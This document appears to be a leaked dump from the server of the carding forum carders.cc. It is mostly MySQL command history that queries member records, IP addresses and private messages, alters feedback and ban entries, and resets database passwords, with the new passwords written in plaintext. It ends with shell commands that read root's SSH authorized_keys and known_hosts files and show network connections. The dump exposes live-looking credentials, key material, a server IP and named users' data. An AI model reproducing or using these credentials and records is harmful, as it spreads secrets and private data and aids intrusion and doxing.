memberName, AdditionalGroups from carders_smf_members where memberName like 'Zagerus' +; +select memberName, aditionalGroups from carders_smf_members where memberName like 'Zagerus'; +select memberName, Groups from carders_smf_members where memberName like 'Zagerus'; +select memberName, Group from carders_smf_members where memberName like 'Zagerus'; +select memberName, ID_POST_GROUP from carders_smf_members where memberName like 'Zagerus'; +select memberName, ID_POST_GROUP from carders_smf_members where memberName like 'sp0t'; +UPDATE carders_smf_members SET ID_POST_GROUP='4' WHERE ID_POST_GROUP='5'; +SELECT memberName, dateRegistered FROM carders_smf_members WHERE memberName LIKE 'Zagerus'; +use smf_carders_cc; +SELECT memberName, dateRegistered FROM carders_smf_members WHERE memberName LIKE 'kron0s'; +select * from carders_smf_members where unix_timestamp(dateRegistered) > unix_timestamp()-7889231,49; +select * from carders_smf_members where unix_timestamp(dateRegistered) > unix_timestamp()-7889231.49; +select * from carders_smf_members where unix_timestamp(dateRegistered) > unix_timestamp()-7889231; +select memberName from carders_smf_members where unix_timestamp(dateRegistered) > unix_timestamp()-7889231; +show tables; +select memberName from carders_smf_members where timestamp(dateRegistered) >timestamp()-7889231; +SELECT UNIX_TIMESTAMP(dateRegistered) AS udt FROM carders_smf_members; +SELECT TIMESTAMP(dateRegistered) AS udt FROM carders_smf_members; +show tables; +select dateRegistered from carders_smf_members LIMIT 2; +SELECT TIME(dateRegistered) AS udt FROM carders_smf_members; +SELECT memberName, dateRegistered FROM carders_smf_members WHERE dateRegistered BETWEEN NOW - INTERVAL 3months; +SELECT memberName, dateRegistered FROM carders_smf_members WHERE dateRegistered BETWEEN NOW - INTERVAL 3 months; +SELECT memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW - INTERVAL 3 months; +SELECT memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW-INTERVAL 3 months; +SELECT memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW-INTERVAL '3 months'; +SELECT memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW; +SELECT memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW AND INTERVAL 3months; +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW()-3months AND NOW(); +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW()- INTERVAL 3months AND NOW(); +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW()- INTERVAL 30days AND NOW(); +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW()- INTERVAL 30 days AND NOW(); +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW()- INTERVAL 30days' AND NOW(); +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW()- INTERVAL 30days' AND NOW(); +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW()- INTERVAL 30days' AND NOW(); +clear +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW()- INTERVAL 30days' AND NOW(); +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW()- INTERVAL 30days' AND NOW(); +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW()- INTERVAL 30days' AND NOW(); +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW()- INTERVAL 30days' AND NOW(); +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW()- INTERVAL 30days' AND NOW(); +; +use smf_carders_cc; +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW() - INTERVAL 30days' AND NOW(); +' +'' +; +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW() - INTERVAL 30days' AND NOW(); +' ''; +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW() - INTERVAL 30days AND NOW(); +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW() - INTERVAL 3months; +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW() - INTERVAL 3months AND NOW(); +select memberName FROM carders_smf_members WHERE dateRegistered BETWEEN NOW() - 'INTERVAL 3months' AND NOW(); +SELECT UNIX_TIMESTAMP(); +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) <= NOW(); +use smf_carders_cc; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) > NOW()- INTERVAL 3months; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) > NOW()- INTERVAL 3month; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) > NOW() - INTERVAL 3month; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) > `NOW()-INTERVAL 3months`; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < INTERVAL 3months; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < NOW()-INTERVAL 3months; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < NOW()-7889231; +use smf_carders_cc; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) > NOW()-7889231; +SELECT memberName FROM carders_smf_members WHERE +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) > UNIX_TIMESTAMP(NOW()-7889231); +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < UNIX_TIMESTAMP(NOW()-7889231); +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) > UNIX_TIMESTAMP(NOW()-7889231) AND ; +select * from carders_smf_members WHERE username LIKE 'kron0s'; +select * from carders_smf_members WHERE memberName LIKE 'kron0s'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) > UNIX_TIMESTAMP(NOW()-7889231) AND posts >= '200'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < UNIX_TIMESTAMP(NOW()-7889231) AND posts >= '200'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < UNIX_TIMESTAMP(NOW()-7889231) AND posts >= '100'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < UNIX_TIMESTAMP(NOW()-7889231) AND posts >= '200'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < UNIX_TIMESTAMP(NOW()-7889231) AND posts >= '150'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < UNIX_TIMESTAMP(NOW()-10518975) AND posts >= '150'; +SELECT memberName FROM carders_smf_members posts >= '150'; +SELECT memberName FROM carders_smf_members WHERE posts >= '150'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered)-10518975 > UNIX_TIMESTAMP(NOW()-10518975) AND posts >= '150'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered)-10518975 < UNIX_TIMESTAMP(NOW()-10518975) AND posts >= '150'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered)-10518975 < UNIX_TIMESTAMP(NOW()) AND posts >= '150'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < UNIX_TIMESTAMP(NOW()) AND posts >= '150'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < UNIX_TIMESTAMP(NOW())-10518895 AND posts >= '150'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < UNIX_TIMESTAMP(NOW()-10518895) AND posts >= '150'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered) < UNIX_TIMESTAMP(NOW()-10518) AND posts >= '150'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered-10515) < UNIX_TIMESTAMP(NOW()) AND posts >= '150'; +SELECT memberName FROM carders_smf_members WHERE UNIX_TIMESTAMP(dateRegistered-10125125515) < UNIX_TIMESTAMP(NOW()) AND posts >= '150'; +select count(memberName) from carders_smf_members WHERE posts <= '3' +; +select count(memberName) from carders_smf_members WHERE posts <= '10' +; +select membername, count(memberName) from carders_smf_members WHERE posts <= '10' +; +select membername from carders_smf_members WHERE posts <= '10' +; +use smf_carders_cc; +DELETE from carders_smf_members WHERE posts <= '10'; +use smf_carders_cc; +select count(memberName) from carders_smf_members; +show database; +show databases; +use cms_carders_cc; +show tables; +select count(memberName) from carders_smf_members; +use smf_carders_cc; +select count(memberName) from carders_smf_members; +use cms_carders_cc; +show tables; +select count(userid) from users WHERE posts <= '10'; +select count(userid) from user WHERE posts <= '10'; +use smf_carders_cc; +select count(memberName) FROM carders_smf_members WHERE posts <='5'; +select count(memberName) FROM carders_smf_members WHERE post <='5'; +select count(memberName) FROM carders_smf_members WHERE posts <='5'; +select count(memberName) FROM carders_smf_members WHERE posts <= '5' ; +select count(*) FROM carders_smf_members WHERE posts <= '5' ; +select count(*) FROM carders_smf_members WHERE posts <= '6' ; +select count(*) FROM carders_smf_members WHERE posts <= '10' ; +use smf_carders_cc; +select count(*) FROM carders_smf_members WHERE posts <= '10' ; +use cms_carders_cc; +select count(userid) from users where posts <='5'; +select count(userid) from user where posts <='5'; +select count(userid) from user where posts <='2'; +select count(userid) from user where posts <='1'; +select count(userid) from user where posts <='0'; +use smf_carders_cc; +show tables; +select * from carders_smf_messages limit 2; +select * from carders_smf_messages where posterIP >= '2' +select * from carders_smf_messages where posterIP >= '2'; +select * from carders_smf_messages where posterIP >= '2' select * from carders_smf_messages where posterIP >= '2'; +select * from carders_smf_messages where posterIP >= '2'; +select * from carders_smf_messages where posterIP >= '3'; +select * from carders_smf_messages where posterIP LIKE '****' +select * from carders_smf_messages where count(posterIP) > '3' +; +select * from carders_smf_messages where posterIP LIKE '62.%' +; +show tables; +select * from carders_smf_members limit 2; +select memberName, memberIP, memberIP2 from carders_smf_members where memberName like 'kron0s'; +use smf_carders_cc; +select memberName, memberIP, memberIP2 from carders_smf_members where memberName like 'kron0s'; +use smf_carders_cc; +select memberName, memberIP, memberIP2 from carders_smf_members where memberName like 'kron0s'; +use smf_carders_cc; +select memberName, memberIP, memberIP2 from carders_smf_members where memberName like 'kron0s'; +drop database smf_carders_cc; +create database smf_carders_cc; +\. /root/smf_carders_cc.sql +use smf_carders_cc; +DELETE FROM carders_smf_members WHERE post = '0'; +DELETE FROM carders_smf_members WHERE posts = '0'; +use smf_carders_cc; +select * from carders_smf_members WHERE id_group='9'; +use smf_carders_cc; +select * from carders_smf_members WHERE char_length(member_ip) >= 2; +select * from carders_smf_members WHERE char_length(member_ip) >= 2 +; +select * from carders_smf_members WHERE char_length(member_ip) >= 2; +select * from carders_smf_members WHERE char_length(member_ip) >= 2 or char_length(member_ip2) >= 2; +show tables; +select * from carders_smf_log_actions limit 1; +select * from carders_smf_log_actions limit 10; +select * from carders_smf_log_actions; +select * from carders_smf_log_errors; +use smf_carders_cc; +show tables; +select * frm carders_smf_feedbacks; +select * from carders_smf_feedback; +select * from carders_smf_feedbacks; +select * from carders_smf_feedback; +show fields; +show fields from carders_smf_feedback; +show databases; +select * from carders_smf_feedback; +UPDATE carders_smf_feedback SET salevalue='2' WHERE salevalue='1'; +UPDATE carders_smf_feedback SET salevalue='0' WHERE salevalue='2'; +UPDATE carders_smf_feedback SET salevalue='2' WHERE salevalue='-1'; +exi +exit; +exi exit; +exit; +use smf_carders_cc; +use cms_carders_cc; +show tables; +select * From infraction limit 1; +use smf_carders_cc; +show tables; +select * from carders_smf_members limit 1; +select * from carders_smf_feedback limit 1; +delete * From carders_smf_feedback; +DELETE FROM carders_smf_feedback; +UPDATE carders_smf_feedback SET salevalue='2' WHERE salevalue='-1'; +UPDATE carders_smf_feedback SET salevalue='0' WHERE salevalue='1'; +use smf_carders_cc; +show tables; +select * from carders_smf_personal_message limit 1; +select * from carders_smf_personal_messages limit 1; +select * from carders_smf_personal_messages limit 1 WHERE subject=''; +select * from carders_smf_personal_messages WHERE subject='' limit 1; +select * from carders_smf_personal_messages WHERE body='' limit 1; +select * from carders_smf_personal_messages WHERE id_member_from='' limit 1; +select * from carders_smf_personal_messages WHERE id_pm='' limit 1; +select * from carders_smf_personal_messages WHERE id_pm_head='' limit 1; +select * from carders_smf_personal_messages WHERE from_name='' limit 1; +show fields from carders_smf_personal_messages; +select * from carders_smf_personal_messages WHERE body=''; +select * from carders_smf_personal_messages WHERE subject=''; +select * from carders_smf_personal_messages WHERE id_pm_head='''; +; +select * from carders_smf_personal_messages WHERE id_pm_head=''; +; +use smf_carders_cc; +select * from carders_smf_personal_messages WHERE id_pm_head=''; +select * from carders_smf_personal_messages WHERE deleted_by_sender=''; +use smf_carders_cc; +delete from carders_smf_personal_messages where deleted_by_sender = ''; +show fields from carders_smf_personal_messages; +delete from carders_smf_personal_messages; +\. /home/carderscc/carders.cc/carders_smf_personal_messages.sql +use smf_carders_cc; +show tables; +select * from carders_smf_ban_items +; +select * from carders_smf_ban_groups; +delete from carders_smf_ban_groups; +select * from carders_smf_ban_groups; +delete from carders_smf_ban_groups; +select * from carders_smf_ban_groups; +select * from carders_smf_ban_groups limit 5; +select * from carders_smf_ban_groups where expire_time != '0' limit 5; +use smf_carders_cc; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Ripper%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE name='bla2006'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Bann%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Doppel-Account%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Goodbye%' +; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Doppelaccount%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%good bye%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Leecher%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Fakeaccount%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Resell%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%sec0com%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Hurensohn%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Virus%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%rippen%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%SCHEISSE%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%rechtes gedankengut%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%scammer%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Rippversuch%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%spast%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Doppelacc%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Tripple%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%rippte%'; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%abwerben%'; +CREATE DATABASE ''cms_carders_cc'';ss +; +UPDATE carders_smf_ban_groups SET expire_time ='1766537999' WHERE reason LIKE '%Tsch?ss%'; +use smf_carders_cc; +show tables; +select COUNT(*) from carders_smf_feedback; +show fields from carders_smf_feedback; +SELECT * FROM carders_smf_feedback limit 10; +SELECT * FROM carders_smf_feedback where salevalue='1' limit 10; +SELECT * FROM carders_smf_feedback where salevalue='2' limit 10; +update carders_smf_feedback set salevalue='0' WHERE salevalue='3'; +SELECT * FROM carders_smf_feedback where saevalue='3' +; +SELECT * FROM carders_smf_feedback where salevalue='3' +; +SELECT * FROM carders_smf_feedback where salevalue ='3'; +show fields from carders_smf_feedback; +SELECT * FROM carders_smf_feedback where saletype='3'; +SELECT * FROM carders_smf_feedback where saletype='2'; +SELECT * FROM carders_smf_feedback where saletype='1'; +SELECT * FROM carders_smf_feedback where saletype='0'; +show fields from carders_smf_feedback; +SELECT * FROM carders_smf_feedback where salevalue='0' +; +delete from carders_smf_feedback; +show fields from carders_smf_feedback; +delete from carders_smf_feedback; +use smf_carders_cc; +show tables; +show fields from carders_smf_settings; +select * from carders_smf_settings where value LIKE '%new_forum_beta_wtf%' +; +UPDATE carders_smf_settings SET value='/home/carderscc/carders.cc/forum/attachments' WHERE variable='attachmentUploadDir'; +UPDATE carders_smf_settings SET value='/home/carderscc/carders.cc/forum/Smileys' WHERE variable='smileys_dir'; +UPDATE carders_smf_settings SET value='/home/carderscc/carders.cc/forum/' where variable='package_path'; +UPDATE carders_smf_settings SET value='/home/carderscc/carders.cc/forum/avatars' WHERE variable='avatar_directory'; +UPDATE carders_smf_settings SET value='http://www.carders.cc/forum/Smileys/' WHERE variable='smileys_dir'; +UPDATE carders_smf_settings SET value='http://www.carders.cc/forum/avatars' WHERE variable='avatar_url'; +use smf_carders_cc; +show tables; +select * From carders_smf_membergroups limit 1; +select * From carders_smf_membergroups where id_group='5' limit 5; +select * From carders_smf_membergroups where id_group='4' limit 5; +select * From carders_smf_membergroups where id_group='3' limit 5; +select * From carders_smf_membergroups where id_group='2' limit 5; +select * From carders_smf_membergroups where id_group='7' limit 5; +select * From carders_smf_membergroups where id_group='6' limit 5; +select * From carders_smf_membergroups where id_group='8' limit 5; +select * From carders_smf_membergroups where id_group='4' limit 5; +use smf_carders_cc; +show tables; +select * from carders_smf_members LIMIT 2; +show fields from carders_smf_members; +select * from carders_smf_members where member_name LIKE 'sp0t'; +select username, id_post_group, additional_group from carders_smf_members where member_name LIKE 'sp0t'; +select member_namee, id_post_group, additional_group from carders_smf_members where member_name LIKE 'sp0t'; +select member_name, id_post_group, additional_group from carders_smf_members where member_name LIKE 'sp0t'; +select member_name, id_post_group, additional_groups from carders_smf_members where member_name LIKE 'sp0t'; +select member_name, id_post_group, additional_groups from carders_smf_members where additional_group='9'; +select member_name, id_post_group, additional_groups from carders_smf_members where additional_groups='9'; +select member_name, id_post_group, additional_groups from carders_smf_members where id_post_group='9'; +select member_name, id_post_group, additional_groups from carders_smf_members where member_name LIKE '0-saft'; +use smf_carders_cc; +select * from carders_smf_members where member_name like 'deim0s'; +select * from carders_smf_members where member_name like 'zagerus'; +select additional_groups from carders_smf_members where member_name like 'zagerus'; +select id_post_group from carders_smf_members where member_name like 'zagerus'; +select additional_groups from carders_smf_members where member_name like 'kron0s'; +update carders_smf_members SET additional_groups='9' WHERE member_name='deim0s'; +use smf_carders_cc; +select member_name, member_ip, member_ip2 FROM carders_smf_members WHERE member_name LIKE 'Zagerus'; +use smf_carders_cc; +show tables; +SELECT * FROM carders_smf_personal_messages LIMIT 5; +SELECT * FROM carders_smf_personal_messages WHERE from_name LIKE 'bedrock' LIMIT 5; +SELECT * FROM carders_smf_personal_messages WHERE from_name LIKE 'bedrock' LIMIT 10; +SELECT * FROM carders_smf_personal_messages WHERE from_name LIKE 'bedrock' LIMIT 20; +SELECT * FROM carders_smf_personal_messages WHERE from_name LIKE 'bedrock' OR from_name LIKE 'tiberius' LIMIT 20; +SELECT member_name, additional_groups, id_post_group WHERE member_name LIKE 'f_white'; +SELECT member_name, additional_groups, id_post_group FROm carders_smf_member WHERE member_name LIKE 'f_white'; +SELECT member_name, additional_groups, id_post_group FROm carders_smf_members WHERE member_name LIKE 'f_white'; +UPDATE carders_smf_members SET additional_groups='', id_post_group='16' WHERE member_name='sPloiT'; +UPDATE carders_smf_members SET additional_groups='', id_post_group='10' WHERE member_name='sPloiT'; +UPDATE carders_smf_members SET additional_groups='10', id_post_group='' WHERE member_name='sPloiT'; +UPDATE carders_smf_members SET additional_groups='10', id_post_group='10' WHERE member_name='sPloiT'; +UPDATE carders_smf_members SET additional_groups='', id_post_group='16' WHERE member_name='sPloiT'; +SELECT member_name, additional_groups, id_post_group FROm carders_smf_members WHERE member_name LIKE 'sploit'; +SELECT member_name, additional_groups, id_post_group FROm carders_smf_members WHERE member_name LIKE 'shmi'; +show tables; +SELECT * FROM carders_smf_permissions WHERE member_name LIKE 'sploit'; +SELECT * FROM carders_smf_permission LIMIT 1; +SELECT * FROM carders_smf_permissions LIMIT 1; +SELECT * FROM carders_smf_permission_profiles LIMIT 1; +SELECT member_name, additional_groups, id_post_group FROm carders_smf_members WHERE member_name LIKE 'shmi'; +select * from carders_smf_ban_items Limit 10; +select * from carders_smf_ban_items Limit 100; +select * from carders_smf_ban_groups Limit 10; +select * from carders_smf_ban_groups WHERE expire_time =Limit 10; +select * from carders_smf_ban_groups WHERE expire_time ='Never' Limit 10; +select * from carders_smf_ban_groups WHERE name='klodeckel'; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='NULL'; +select * from carders_smf_ban_groups Limit 10; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999'; +use smf_carders_cc; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999'; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 100; +latt, | +| Valid_CC^^, | +| faily666, | +| you2andi, | +| beer, | +| Dark-Mary, | +| dudelmaster, | +| willnurmalguck, | +| Pr4da, | +| CrAnK!, | ++-------------------+ +use smf_carders_cc; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 200; ++-------------------+ +| CONCAT(name, ',') | ++-------------------+ +| sPloiT, | +# too long/boring ++-------------------+ +use smf_carders_cc; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 200, 200; ++-------------------+ +| CONCAT(name, ',') | ++-------------------+ +| B4S1C, | +# too long/boring ++-------------------+ +use smf_carders_cc; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 200, 400; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 400, 400; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 400, 100; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 400, 300; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 400, 400; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999'; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 600, 100; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 0, 100; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 0, 200; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 0, 250; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 0, 280; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 0, 270; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 0, 260; +use smf_carders_cc; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 260, 260; +use smf_carders_cc; +SELECT CONCAT(name, ',') FROM carders_smf_ban_groups WHERE expire_time='1766537999' LIMIT 420, 260; +use smf_carders_cc; +select * from carders_smf_personal_messages WHERE member_name LIKE 'bedrocks'; +select * from carders_smf_personal_messages WHERE from_name LIKE 'bedrocks'; +select * from carders_smf_personal_messages WHERE from_name LIKE 'bedrock'; +cd /var/ports +; +use smf_carders_cc; +select * from carders_smf_personal_messages WHERE from_name LIKE 'bedrock'; +select * from carders_smf_personal_messages WHERE from_name LIKE 'kron0s'; +select * from carders_smf_personal_messages WHERE id_member_from='9585'; +select * from carders_smf_personal_messages WHERE id_pm_head='9585'; +use smf_carders_cc; +show fields carders_smf_personal_messages; +show fields from carders_smf_personal_messages; +SELECT * FROM carders_smf_personal_messages WHERE from_name = 'Solih'; +SELECT * FROM carders_smf_personal_messages WHERE from_name = 'Solih' ORDER BY id_pm LIMIT 5; +SELECT * FROM carders_smf_personal_messages WHERE from_name = 'Solih' ORDER BY id_pm LIMIT 10; +SELECT * FROM carders_smf_personal_messages WHERE from_name = 'Kolovrat' ORDER BY id_pm LIMIT 10; +use smf_carders_cc; +show fields from carders_smf_personal_messages; +SELECT * FROM carders_smf_personal_messages WHERE from_name='jerm83'; +SELECT * FROM carders_smf_personal_messages WHERE from_name='sleepdady'; +SELECT * FROM carders_smf_personal_messages WHERE from_name='kron0s'; +use smf_carders_cc; +select * from carders_smf_personal_messages WHERE from_name =' +titan1970'; +select * from carders_smf_personal_messages WHERE from_name =' +titan1970'; +select * from carders_smf_personal_messages WHERE from_name ='titan1970'; +status +use mysql; +UPDATE user SET Password=PASSWORD('v6Hel0FCm1L9yIhz8uu4M53oJ3xzsX') WHERE User='root'; +FLUSH PRIVILEGES; +use mysql; +UPDATE user SET Password=PASSWORD('hVN2m8LHYxKsF0Rp3hiaSfug0Vh7E5') WHERE User='cms_carders_cc'; +use mysql +FLUSH PRIVILEGES; +use mysql +UPDATE user SET Password=PASSWORD('IMNLX0NRfBapOGZraOJoXRCJBlh40A') WHERE user='vpn24'; +FLUSH PRIVILEGES; +use smf_card +use smf_carders_cc; +select * from carders_smf_personal_messages LIMIT 1; +select * from carders_smf_personal_messages LIMIT ORDER BY id_pm DESC LIMIT 1; +select * from carders_smf_personal_messages ORDER BY id_pm DESC LIMIT 1; + +~$ ls -lah /root/.ssh +total 16 +drwx------ 2 root wheel 512B May 4 18:02 . +drwxr-xr-x 8 root wheel 1.0K May 4 18:55 .. +-rw-r--r-- 1 root wheel 399B May 4 18:02 authorized_keys +-rw-r--r-- 1 root wheel 603B May 4 16:43 known_hosts + +~$ cat /root/.ssh/authorized_keys +ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvUly/bnUF0Dz/yL+XUTrjEsciSBDjn7ia9dGBL4m/63zT73KVsw7BXsBq1Mc20NPTTVhvF2s6W5eKceSBJJ/+CbhjKQk96ZO9Ic6VZCkdTDQzEePfWyN+7f4JmJMXdbZcqIaN6EGathyfw7oAVt8d1nAhYGDdTfz1HAbGRGOb+Aa5du8gVqSdseGnj/FbOcHHwuDg/Sa0AG5+jAKFLECdNDh4+IkETwaQmWg8pLQq9ehTdGBE2aiP8OzT9DLSowKm7zcI/qrYKwFqPJpPn6THKB4ytLb8UzJLv44Yh6CXRjAD4yxxKmtifdSWvyZAU0SRVIJJywMkYZlbWIGZbI0qQ== chillkroete@kiste + +~$ cat /root/.ssh/known_hosts +77.91.227.105 ssh-dss AAAAB3NzaC1kc3MAAACBAJIqFlnT0nCXeAj76zdyWyZKh80O5UUacEvCUmCsbztdz+6uP/onvmgxJxlkJNFRkZJ/EIit+q7if40Lm3CwxZ38oFq3OBOdcQxrm3O4jTumGfsLbQV7J4ZUU9sXCmPGXL1SqBOt+IOVuIIZB3BM/AnVxtfVNJz3ugrK8jj3nR8RAAAAFQCD9GzD/1V4+v57mQi2ME/96PWHowAAAIAVawBuTeL2mb4Q03WrzwzTBEWY7Oiy7Ssw0IUAXnlreLuU5sNSLnnlbUA2s9pDnevwOfF9GOJ+FeN5zmIgXEwheyJxhBq08JvfLsWOXh2pzX1LN0m5eXjIOw9w2sLKdfRF4BOeevKIa2lnrQwEIxeNiVylvozfuuffVG/Xg3yWMgAAAIB3K43EtrMNLPzO14c2SrFtJCqjQJIIXrc+P5LAoI8QV1TAqAhMU1ep9KM/n4WSDw87e9XEjUcg/mnuhIhUySkdrPgw5jpmL94hp1WuDwhwbP0AyhVqOJj0pJHQQ6WqjCPeua3xREn/ROm+pvVFT9YcXVOrBK8N+ZqbrU+GzRwXNg== + +~$ netstat -n +netstat: kvm not available: /dev/mem: No such file or directory +Active Internet connections +Proto Recv-Q Send-Q Local Address Foreign Address (state) +tcp4 0 0 77.91.227.105.1288 77.91.227.105.10290 ESTABLISHED +udp4 0 0 77.91.227.105.123 *.* +Active UNIX domain sockets +Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr +ffffff021b46b6c8 stream 0 0 0 ffffff00454caaa8 0 0 /tmp/mysql.sock +ffffff00454caaa8 stream 0 0 0 ffffff021b46b6c8 0 0 +ffffff003f1ae9b0 stream 0 0 ffffff01c227e5e8 0 0 0 /tmp/mysql.sock +ffffff0045a535d0 dgram 0 0 0 ffffff0045a531f0 0 ffffff0036319aa8 +ffffff0036319aa8 dgram 0 0 0 ffffff0045a531f0 0 0 +ffffff0045a531f0 dgram 0 0 ffffff020543e5e8 0 ffffff0045a535d0 0 /var/run/logpriv +ffffff01670f89b0 dgram 0 0 ffffff020524d9d8 0 0 0 /var/run/log + +~$ netstat -a +netstat: kvm not available: /dev/mem: No such file or directory +Active Internet connections (including servers) +Proto Recv-Q Send-Q Local Address Foreign Address (state) +tcp4 0 0 sec1295.1288 sec1295.10443 ESTABLISHED +tcp4 0 0 sec1295.1288 *.* LISTEN +tcp4 0 0 sec1295.33333 *.* LISTEN +tcp4 0 0 sec1295.ftp *.* LISTEN +tcp4 0 0 sec1295.ssh *.* LISTEN +udp4 0 0 sec1295.ntp *.* +Active UNIX domain 